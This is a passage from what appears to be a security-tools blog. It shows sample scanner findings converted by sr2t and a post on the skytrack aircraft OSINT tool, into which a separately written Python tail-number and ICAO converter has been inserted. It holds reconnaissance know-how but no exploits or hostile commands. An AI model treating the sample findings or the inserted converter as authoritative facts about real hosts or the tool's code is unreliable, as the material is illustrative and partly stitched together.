<pre><code>$ sr2t --nessus example/nessus.nessus -oC example<br />$ cat example_nessus.csv<br />host,port,plugin id,plugin name,severity,annotations<br />192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X<br />192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X<br />192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X<br />192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X<br />192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X<br />192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X<br />192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X<br />192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X<br />192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X<br />192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X<br />192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X<br />192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X<br />192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X<br />192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X<br />192.168.142.2,3389,30218,Terminal Services Encryption Level 
is not FIPS-140 Compliant,1,X<br />192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X<br />192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X<br />192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X<br />192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X<br />192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X<br />192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X<br />192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X<br />192.168.142.2,445,57608,SMB Signing not required,2,X<br /></code></pre>
<h3>Nmap</h3>
<p>To produce an XLSX file:</p>
<pre><code>$ sr2t --nmap example/nmap.xml -oX example.xlsx<br /></code></pre>
<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgMlODPqOGd_I1zcRBiUjQSSMA-bbgbtY316lsLGMTuvH5AHtMotfJ54_fttCErE1ipA1ZsZgJTLhPXNaqZ0E0lup2Ybb-gduzjzecwam_f0B_j4Nt2Ay3P63tR91UPveTr_ejbshhr-AupDksFVyf73ji2SKa3krOjclGmoSsgNmUTYpJIA6-UonKhKx4"><img alt="" border="0" height="504" id="BLOGGER_PHOTO_ID_7348941240971270610" src="https://blogger.googleusercontent.com/img/a/AVvXsEgMlODPqOGd_I1zcRBiUjQSSMA-bbgbtY316lsLGMTuvH5AHtMotfJ54_fttCErE1ipA1ZsZgJTLhPXNaqZ0E0lup2Ybb-gduzjzecwam_f0B_j4Nt2Ay3P63tR91UPveTr_ejbshhr-AupDksFVyf73ji2SKa3krOjclGmoSsgNmUTYpJIA6-UonKhKx4=w640-h504" width="640" /></a></p>
<p>To produce a text table on stdout:</p>
<pre><code>$ sr2t --nmap example/nmap.xml --nmap-services<br />Nmap TCP:<br />+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+<br />| | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |<br />+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+<br />| 192.168.23.78 | X | | X | X | X | X | X | X | | |<br />| 192.168.27.243 | | | | X | X | | X | X | X | X |<br />| 192.168.99.164 | | | | X | X | | X | X | X | X |<br />| 192.168.228.211 | | X | | | | | | | | |<br 
/>| 192.168.171.74 | | | | X | X | | X | X | X | X |<br />+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+<br /><br />Nmap Services:<br />+-----------------+------+-------+---------------+-------+<br />| ip address | port | proto | service | state |<br />+-----------------+------+-------+---------------+-------+<br />| 192.168.23.78 | 53 | tcp | domain | open |<br />| 192.168.23.78 | 88 | tcp | kerberos-sec | open |<br />| 192.168.23.78 | 135 | tcp | msrpc | open |<br />| 192.168.23.78 | 139 | tcp | netbios-ssn | open |<br />| 192.168.23.78 | 389 | tcp | ldap | open |<br />| 192.168.23.78 | 445 | tcp | microsoft-ds | open |<br />| 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |<br />| 192.168.27.243 | 135 | tcp | msrpc | open |<br />| 192.168.27.243 | 139 | tcp | netbios-ssn | open |<br />| 192.168.27.243 | 445 | tcp | microsoft-ds | open |<br />| 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |<br />| 192.168.27.243 | 5800 | tcp | vnc-http | open |<br />| 192.168.27.243 | 5900 | tcp | vnc | open |<br />| 192.168.99.164 | 135 | tcp | msrpc | open |<br />| 192.168.99.164 | 139 | tcp | netbios-ssn | open |<br />| 192.168.99.164 | 445 | tcp | microsoft-ds | open |<br />| 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |<br />| 192.168.99.164 | 5800 | tcp | vnc-http | open |<br />| 192.168.99.164 | 5900 | tcp | vnc | open |<br />| 192.168.228.211 | 80 | tcp | http | open |<br />| 192.168.171.74 | 135 | tcp | msrpc | open |<br />| 192.168.171.74 | 139 | tcp | netbios-ssn | open |<br />| 192.168.171.74 | 445 | tcp | microsoft-ds | open |<br />| 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |<br />| 192.168.171.74 | 5800 | tcp | vnc-http | open |<br />| 192.168.171.74 | 5900 | tcp | vnc | open |<br />+-----------------+------+-------+---------------+-------+<br /></code></pre>
<p>Or to output a CSV file:</p>
<pre><code>$ sr2t --nmap example/nmap.xml -oC example<br />$ cat example_nmap_tcp.csv<br />ip 
address,53,80,88,135,139,389,445,3389,5800,5900<br />192.168.23.78,X,,X,X,X,X,X,X,,<br />192.168.27.243,,,,X,X,,X,X,X,X<br />192.168.99.164,,,,X,X,,X,X,X,X<br />192.168.228.211,,X,,,,,,,,<br />192.168.171.74,,,,X,X,,X,X,X,X<br /></code></pre>
<h3>Nikto</h3>
<p>To produce an XLSX file:</p>
<pre><code>$ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx<br /></code></pre>
<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgpqjTaSiVpzx7ChR8m36af20pM3HHMBGsW9Tn5paxwXM1qjr16w9sJQy7o2xD-CVKAGEVpj42mW9xATzag9zhqyAWmD-_KI_rq7SiDlVT5SQtZK1gwVmaQPwWsI3tR8xCfpNBrfP-NvjLRuNsJ7W7Q0eI9Ekn5zZLvb5EYZknNNwjcOj-BAUXDCYjYGVg"><img alt="" border="0" height="376" id="BLOGGER_PHOTO_ID_7348941247672650594" src="https://blogger.googleusercontent.com/img/a/AVvXsEgpqjTaSiVpzx7ChR8m36af20pM3HHMBGsW9Tn5paxwXM1qjr16w9sJQy7o2xD-CVKAGEVpj42mW9xATzag9zhqyAWmD-_KI_rq7SiDlVT5SQtZK1gwVmaQPwWsI3tR8xCfpNBrfP-NvjLRuNsJ7W7Q0eI9Ekn5zZLvb5EYZknNNwjcOj-BAUXDCYjYGVg=w640-h376" width="640" /></a></p>
<p>To produce a text table on stdout:</p>
<pre><code>$ sr2t --nikto example/nikto.xml<br />+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+<br />| target ip | target hostname | target port | description | annotations |<br />+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+<br />| 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |<br />| 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |<br />| | | | agent to protect against some forms of XSS | |<br />| 192.168.178.10 | 192.168.178.10 | 80 | The X-Content-Type-Options header is not set. 
This could allow the user agent to | X |<br />| | | | render the content of the site in a different fashion to the MIME type | |<br />+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+<br /></code></pre>
<p>Or to output a CSV file:</p>
<pre><code>$ sr2t --nikto example/nikto.xml -oC example<br />$ cat example_nikto.csv<br />target ip,target hostname,target port,description,annotations<br />192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X<br />192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user<br />agent to protect against some forms of XSS",X<br />192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to<br />render the content of the site in a different fashion to the MIME type",X<br /></code></pre>
<h3>Dirble</h3>
<p>To produce an XLSX file:</p>
<pre><code>$ sr2t --dirble example/dirble.xml -oX example.xlsx<br /></code></pre>
<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjEXQecLHyepfW-ywWo7JjssmDT8ElMuToGZURqa1tob7HnPT8PiYm3goWz4FreDyQktj4KK9D5czpHn5_-PbiOweInsQqm7G1_nXPuPwD050LOE1DZN27aZe3Zfwd6MZ5f9LF33cqzzF7JJGrGai9c7LTXQpsH82zWMeIG-ROcQNv_-J5W9qrNu4qYL00"><img alt="" border="0" height="302" id="BLOGGER_PHOTO_ID_7348941248701865586" src="https://blogger.googleusercontent.com/img/a/AVvXsEjEXQecLHyepfW-ywWo7JjssmDT8ElMuToGZURqa1tob7HnPT8PiYm3goWz4FreDyQktj4KK9D5czpHn5_-PbiOweInsQqm7G1_nXPuPwD050LOE1DZN27aZe3Zfwd6MZ5f9LF33cqzzF7JJGrGai9c7LTXQpsH82zWMeIG-ROcQNv_-J5W9qrNu4qYL00=w640-h302" width="640" /></a></p>
<p>To produce a text table on stdout:</p>
<pre><code>$ sr2t --dirble example/dirble.xml<br />+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+<br />| url | 
code | content len | is directory | is listable | found from listable | redirect url | annotations |<br />+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+<br />| http://example.org/flv | 0 | 0 | false | false | false | | X |<br />| http://example.org/hire | 0 | 0 | false | false | false | | X |<br />| http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |<br />| http://example.org/print_order | 0 | 0 | false | false | false | | X |<br />| http://example.org/putty | 0 | 0 | false | false | false | | X |<br />| http://example.org/receipts | 0 | 0 | false | false | false | | X |<br />+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+<br /></code></pre> <p>Or to output a CSV file:</p> <pre><code>$ sr2t --dirble example/dirble.xml -oC example<br />$ cat example_dirble.csv<br />url,code,content len,is directory,is listable,found from listable,redirect url,annotations<br />http://example.org/flv,0,0,false,false,false,,X<br />http://example.org/hire,0,0,false,false,false,,X<br />http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X<br />http://example.org/print_order,0,0,false,false,false,,X<br />http://example.org/putty,0,0,false,false,false,,X<br />http://example.org/receipts,0,0,false,false,false,,X<br /><br /></code></pre> <h3>Testssl</h3> <p>To produce an XLSX format:</p> <pre><code>$ sr2t --testssl example/testssl.json -oX example.xlsx<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhRORk3DLTkf-buGgFxAU52BcXDVsuTU9AoKnp7USUeM-hNFLr5opEuH5P7QgOLTrexKfJmtWJ99zHpGmzhT1pWUFuQnn06JzN11xivAS-Bj2l2koyo1uugWMZl1q00ilpDfU1MymqAr7GUZIgeZJGaTwrOaPjueF4p7rvy51MmyL3pNqFDpc6Y2UmS4ns"><img alt="" border="0" height="376" id="BLOGGER_PHOTO_ID_7348941251753286482" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEhRORk3DLTkf-buGgFxAU52BcXDVsuTU9AoKnp7USUeM-hNFLr5opEuH5P7QgOLTrexKfJmtWJ99zHpGmzhT1pWUFuQnn06JzN11xivAS-Bj2l2koyo1uugWMZl1q00ilpDfU1MymqAr7GUZIgeZJGaTwrOaPjueF4p7rvy51MmyL3pNqFDpc6Y2UmS4ns=w640-h376" width="640" /></a></p> <p>To produce a text tabular format on stdout:</p> <pre><code>$ sr2t --testssl example/testssl.json<br />+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+<br />| ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |<br />+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+<br />| rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |<br />+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+<br /></code></pre> <p>Or to output a CSV file:</p> <pre><code>$ sr2t --testssl example/testssl.json -oC example<br />$ cat example_testssl.csv<br />ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard<br />rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X<br /></code></pre> <h3>Fortify</h3> <p>To produce an XLSX format:</p> <pre><code>$ sr2t --fortify example/fortify.fpr -oX example.xlsx<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhRfNZVvo_QzWDxX7C9IPx7NbYK6OtHYc_sCIS_Q757juJ3-DGUaLPKpMaciwfmWHUa1HODv4mnB1-4bN_Ic2rhE72pvOwXo0x0kpjNq_hQr3ZQDIl7vsbjgiFIajsnYGSDPw3YJEAaw_Sl7dbKRt7aAbRSASN-bQ82LYkqrcqCgEymZ87npNcxnkGFsdA"><img alt="" border="0" height="334" id="BLOGGER_PHOTO_ID_7348941254587723954" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEhRfNZVvo_QzWDxX7C9IPx7NbYK6OtHYc_sCIS_Q757juJ3-DGUaLPKpMaciwfmWHUa1HODv4mnB1-4bN_Ic2rhE72pvOwXo0x0kpjNq_hQr3ZQDIl7vsbjgiFIajsnYGSDPw3YJEAaw_Sl7dbKRt7aAbRSASN-bQ82LYkqrcqCgEymZ87npNcxnkGFsdA=w640-h334" width="640" /></a></p> <p>To produce a text tabular format on stdout:</p> <pre><code>$ sr2t --fortify example/fortify.fpr<br />+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+<br />| | type | subtype | severity | confidence | annotations |<br />+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+<br />| example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |<br />| example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |<br />| example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |<br />| example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |<br />| example5/web.xml:166:166 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |<br />| example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |<br />| example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |<br />+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+<br /></code></pre> <p>Or to output a CSV file:</p> <pre><code>$ sr2t --fortify example/fortify.fpr -oC example<br />$ cat example_fortify.csv<br />,type,subtype,severity,confidence,annotations<br />example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X<br />example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X<br />example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X<br />example4/web.xml:108:108,J2EE 
Misconfiguration,Incomplete Error Handling,3.0,5.0,X<br />example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X<br />example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X<br />example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X<br /></code></pre> <h2>Donate</h2> <ul> <li>WOW: <code>WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp</code></li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://gitlab.com/0bs1d1an/sr2t" rel="nofollow" target="_blank" title="Download Sr2T">Download Sr2T</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-34742759548209010072024-03-22T08:30:00.011-03:002024-03-22T08:30:00.129-03:00Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg06aKoszBH407ZGXGJ6AqjMD10YhOqN26u9MEmr3e6ntZC84dUmm6V7_BljogGYzM52s6uctbcnq__WtMSTZDft7H_0-oLiyvknNhSFHH4ZFJHbXx1i-fExgKAullS1BnlKEUndVoH6tza8yn4nBK12LfkGox4V4y1ohev2M45cpKBVHd9FdhY9ko7j2A"><img alt="" border="0" height="360" id="BLOGGER_PHOTO_ID_7348938031430712770" src="https://blogger.googleusercontent.com/img/a/AVvXsEg06aKoszBH407ZGXGJ6AqjMD10YhOqN26u9MEmr3e6ntZC84dUmm6V7_BljogGYzM52s6uctbcnq__WtMSTZDft7H_0-oLiyvknNhSFHH4ZFJHbXx1i-fExgKAullS1BnlKEUndVoH6tza8yn4nBK12LfkGox4V4y1ohev2M45cpKBVHd9FdhY9ko7j2A=w640-h360" width="640" /></a></p> <h2>About</h2> <p></p><p>skytrack is a command-line based plane spotting and aircraft OSINT <a href="https://www.kitploit.com/search/label/Reconnaissance" target="_blank" title="reconnaissance">reconnaissance</a> tool made using Python. 
It can gather aircraft <a href="https://www.kitploit.com/search/label/Information" target="_blank" title="information">information</a> using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose <a href="https://www.kitploit.com/search/label/Reconnaissance" target="_blank" title="reconnaissance">reconnaissance</a>.</p><span><a name='more'></a></span><p><br /></p><h2>What is Planespotting & Aircraft OSINT?</h2> <p></p><p>Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft <a href="https://www.kitploit.com/search/label/Information" target="_blank" title="information">information</a> <a href="https://www.kitploit.com/search/label/Gathering" target="_blank" title="gathering">gathering</a> and OSINT is a crucial step in the planespotting process. 
OSINT (Open Source Intelligence) describes a methodology of using publicly accessible data sources to obtain data about a specific subject, in this case planes!</p><h2>Aircraft Information</h2> <ul> <li>Tail Number</li> <li>Aircraft Type</li> <li>ICAO24 Designation</li> <li>Manufacturer Details</li> <li>Flight Logs</li> <li>Aircraft Owner</li> <li>Model</li> <li>Much more!</li> </ul> <h2>Usage</h2> <p>To run skytrack on your machine, follow the steps below:</p> <pre><code>$ git clone https://github.com/ANG13T/skytrack<br />$ cd skytrack<br />$ pip install -r requirements.txt<br />$ python skytrack.py<br /></code></pre> <p>skytrack works best with Python version 3.</p> <h2>Preview</h2> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhKVVZW7_ROkae7ba9kKQekXul_bLeCorY9LbyXd0Y1Ueu0X63alUJgdhg9W0n4MCNX2m7aQg8ykaWllPE4PA57E6WAO68MTOFmrrHdJhlEKnqNxm5D7g2vOLJcp0VALZJm0_yaD_BrWnxWO-KkoBnMfGcyLyuDYkzlT06aUWe_0pfnFqsunJ-aqCDJWHw"><img alt="" border="0" height="614" id="BLOGGER_PHOTO_ID_7348938037852268914" src="https://blogger.googleusercontent.com/img/a/AVvXsEhKVVZW7_ROkae7ba9kKQekXul_bLeCorY9LbyXd0Y1Ueu0X63alUJgdhg9W0n4MCNX2m7aQg8ykaWllPE4PA57E6WAO68MTOFmrrHdJhlEKnqNxm5D7g2vOLJcp0VALZJm0_yaD_BrWnxWO-KkoBnMfGcyLyuDYkzlT06aUWe_0pfnFqsunJ-aqCDJWHw=w640-h614" width="640" /></a></p> <h2>Features</h2> <p>skytrack features three main functions for aircraft <a href="https://www.kitploit.com/search/label/Information" target="_blank" title="information">information</a> <a href="https://www.kitploit.com/search/label/Gathering" target="_blank" title="gathering">gathering</a> and display options. They include the following:</p> <h3>Aircraft Reconnaissance & OSINT</h3> <p>skytrack obtains general <a href="https://www.kitploit.com/search/label/Information" target="_blank" title="information">information</a> about the aircraft given its tail number or ICAO designator. 
The tool sources this <a href="https://www.kitploit.com/search/label/Information" target="_blank" title="information">information</a> from several reliable data sets. Once the data is collected, it is displayed in the terminal in a table layout.</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiW_SBDKshIG6h5spWbtgUm6RYnJsOnffIywYIHlt1JQRW81RQPia-qarLDLnYIwkgNFWHoCljb-CBXM3-E7i74ytzeuP2odo7jR4fWfgtlZMeyGl89GWSTXtOzqbalL2ISF2-XJJQ76QjEFL0T4IGmP9I8i9qBdczHKvcqhq7Ay77_O9hvrGwrcfXRnCY"><img alt="" border="0" height="322" id="BLOGGER_PHOTO_ID_7348938043904086818" src="https://blogger.googleusercontent.com/img/a/AVvXsEiW_SBDKshIG6h5spWbtgUm6RYnJsOnffIywYIHlt1JQRW81RQPia-qarLDLnYIwkgNFWHoCljb-CBXM3-E7i74ytzeuP2odo7jR4fWfgtlZMeyGl89GWSTXtOzqbalL2ISF2-XJJQ76QjEFL0T4IGmP9I8i9qBdczHKvcqhq7Ay77_O9hvrGwrcfXRnCY=w640-h322" width="640" /></a> </p> <h3>PDF Aircraft Information Report</h3> <p>skytrack also enables you to save the collected aircraft <a href="https://www.kitploit.com/search/label/Information" target="_blank" title="information">information</a> into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. 
The PDF report will be titled "skytrack_report.pdf".</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj3eIcJehI8_CXB-71pZDe-oWZB74QiDZ_eBj9OfarIjViHX2IjE9Nd7VWGFp4Eovzf7zN0z9o6aziHYVDvEOGXb80Ojh3JsLfKTTVrjwj7StWGDOmyh5dbOyYPOn2VbCpSVG3ZRJ716FfJ82gLrQSJN8v9B-m61D1ndEHGZquw2lsbx8rif1bF34RY2Co"><img alt="" border="0" height="486" id="BLOGGER_PHOTO_ID_7348938049802659218" src="https://blogger.googleusercontent.com/img/a/AVvXsEj3eIcJehI8_CXB-71pZDe-oWZB74QiDZ_eBj9OfarIjViHX2IjE9Nd7VWGFp4Eovzf7zN0z9o6aziHYVDvEOGXb80Ojh3JsLfKTTVrjwj7StWGDOmyh5dbOyYPOn2VbCpSVG3ZRJ716FfJ82gLrQSJN8v9B-m61D1ndEHGZquw2lsbx8rif1bF34RY2Co=w640-h486" width="640" /></a></p> <h3>Tail Number to ICAO Converter</h3> <p>There are two standard identification formats for specifying aircraft: the tail number and the ICAO designation. The tail number (also called the N-number) is an alphanumeric ID starting with the letter "N" used to identify aircraft. The ICAO designation is a six-character fixed-length ID in <a href="https://www.kitploit.com/search/label/Hexadecimal" target="_blank" title="hexadecimal">hexadecimal</a> format. Both standards are highly pertinent for aircraft <a href="https://www.kitploit.com/search/label/Reconnaissance" target="_blank" title="reconnaissance">reconnaissance</a>, as both can be used to search for a specific aircraft in data sources. However, converting from one format to the other is cumbersome because the mapping follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.</p>
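<p>As an added illustration (not skytrack's own code), the following Python reproduces the tail number and ICAO address mapping in both directions. It assumes that US-registered aircraft occupy the ICAO24 block A00001 through ADF7C7, that suffix letters never include I or O, and block sizes obtained by counting the N-numbers that can follow each digit position; addresses outside that block are rejected rather than mis-converted.</p>

```python
import re

# Assumption stated in the lead-in: US-registered aircraft occupy the ICAO24
# address block A00001..ADF7C7.
ICAO_FIRST = 0xA00001
ICAO_LAST = 0xADF7C7

# Letters allowed in an N-number suffix; I and O are never used.
LETTERS = "ABCDEFGHJKLMNPQRSTUVWXYZ"

# Suffixes that may follow one, two or three digits: "", A, AA..AZ, B, BA..BZ, ..., ZZ.
SUFFIX_COUNT = 1 + len(LETTERS) * (1 + len(LETTERS))  # 601

# Addresses consumed by each digit position, counted upward from the last one.
# A fifth digit admits no suffix, so:
#   4th digit: 1 (bare) + 24 single letters + 10 fifth digits  = 35
#   3rd digit: 1 + 600 suffixes + 10 * 35                       = 951
#   2nd digit: 1 + 600 suffixes + 10 * 951                      = 10111
#   1st digit: 1 + 600 suffixes + 10 * 10111                    = 101711
STRIDES = (101711, 10111, 951, 35)

_N_NUMBER = re.compile(r"^N([1-9][0-9]{0,4})([A-HJ-NP-Z]{0,2})$")


def _suffix(index):
    """Map a suffix index 0..600 to "", "A", "AA", ..., "ZZ"."""
    if index == 0:
        return ""
    first, second = divmod(index - 1, len(LETTERS) + 1)
    return LETTERS[first] + ("" if second == 0 else LETTERS[second - 1])


def _suffix_index(suffix):
    """Inverse of _suffix for a zero-, one- or two-letter suffix."""
    if not suffix:
        return 0
    index = LETTERS.index(suffix[0]) * (len(LETTERS) + 1) + 1
    if len(suffix) == 2:
        index += LETTERS.index(suffix[1]) + 1
    return index


def icao_to_n_number(icao_hex):
    """Convert a US ICAO24 address given as hex (e.g. "a00003") to its N-number."""
    icao = int(icao_hex, 16)
    if not ICAO_FIRST <= icao <= ICAO_LAST:
        raise ValueError("not a US-registered ICAO24 address: %s" % icao_hex)
    rem = icao - ICAO_FIRST
    out = "N"
    for pos, stride in enumerate(STRIDES):
        digit, rem = divmod(rem, stride)
        out += str(digit + 1 if pos == 0 else digit)  # first digit is 1..9, later ones 0..9
        if rem == 0:
            return out
        if pos < 3:
            if rem < SUFFIX_COUNT:
                return out + _suffix(rem)
            rem -= SUFFIX_COUNT  # skip past the suffixed forms of this prefix
        elif rem <= len(LETTERS):
            return out + LETTERS[rem - 1]  # four digits plus one letter
        else:
            return out + str(rem - len(LETTERS) - 1)  # fifth digit
    raise AssertionError("unreachable")


def n_number_to_icao(n_number):
    """Convert an N-number such as "N1AA" to its ICAO24 address as lowercase hex."""
    match = _N_NUMBER.match(n_number.upper())
    if not match:
        raise ValueError("malformed N-number: %s" % n_number)
    digits, suffix = match.groups()
    if len(digits) + len(suffix) > 5 or (len(digits) == 4 and len(suffix) > 1):
        raise ValueError("N-number too long: %s" % n_number)
    offset = (int(digits[0]) - 1) * STRIDES[0]
    for pos in range(1, len(digits)):
        digit = int(digits[pos])
        if pos < 4:
            offset += SUFFIX_COUNT + digit * STRIDES[pos]
        else:
            offset += len(LETTERS) + 1 + digit
    if suffix:
        if len(digits) == 4:
            offset += LETTERS.index(suffix) + 1
        else:
            offset += _suffix_index(suffix)
    return "%06x" % (ICAO_FIRST + offset)


if __name__ == "__main__":
    for address in ("a00001", "a00002", "a00003", "adf7c7"):
        tail = icao_to_n_number(address)
        print(address, tail, n_number_to_icao(tail))
```

<p>Running the file prints the three addresses from the mapping table plus the last address of the block; converting the result back with <code>n_number_to_icao</code> gives the original address, which is the property worth checking before trusting a converter's output in a report.</p>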
<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhOBHxVw8vjG139sIzpyCvYaon0qagl7-orCsD2c8NDdI1zOVsJQLk60Ri5ODxPbeqNEZtAyiFFPnSrMGUEUdHyHguk784H5dWR3Zj6yRtstRp4jCyTWHCk_eZbs_LrdIHLEsOcwkQN_bvcA7lIrn_M18kar5wzGbeodlEQRTgU0chCm_-oq87NIF-Odlk"><img alt="" border="0" height="170" id="BLOGGER_PHOTO_ID_7348938054443560786" src="https://blogger.googleusercontent.com/img/a/AVvXsEhOBHxVw8vjG139sIzpyCvYaon0qagl7-orCsD2c8NDdI1zOVsJQLk60Ri5ODxPbeqNEZtAyiFFPnSrMGUEUdHyHguk784H5dWR3Zj6yRtstRp4jCyTWHCk_eZbs_LrdIHLEsOcwkQN_bvcA7lIrn_M18kar5wzGbeodlEQRTgU0chCm_-oq87NIF-Odlk=w640-h170" width="640" /></a></p> <details> <summary><b>Further Explanation</b></summary> <p>ICAO addresses and tail numbers follow a mapping like the following:</p> <pre><code>ICAO address N-Number (Tail Number)<br />a00001 N1<br />a00002 N1A<br />a00003 N1AA<br /></code></pre> <p>You can learn more about aircraft registration numbers <a href="https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers" rel="nofollow" target="_blank" title="FAA aircraft registration numbers">here</a>.</p> </details> <blockquote> <p>Warning: the <a href="https://www.kitploit.com/search/label/Converter" target="_blank" title="Converter">converter</a> only works for USA-registered aircraft.</p> </blockquote> <h2>Data Sources & APIs Used</h2> <p><a href="https://www.icao.int/publications/doc8643/pages/search.aspx" rel="nofollow" target="_blank" title="ICAO Aircraft Type Designators Listings">ICAO Aircraft Type Designators Listings</a></p> <p><a href="https://github.com/ANG13T/flightaware.com" rel="nofollow" target="_blank" title="FlightAware">FlightAware</a></p> <p><a href="https://github.com/ANG13T/wikipedia.org" rel="nofollow" target="_blank" title="Wikipedia">Wikipedia</a></p> <p><a href="https://aviation-safety.net" rel="nofollow" target="_blank" title="Aviation Safety Website">Aviation Safety Website</a></p> <p><a href="https://www.jetphotos.com" rel="nofollow" target="_blank" title="Jet Photos Website">Jet Photos Website</a></p> <p><a 
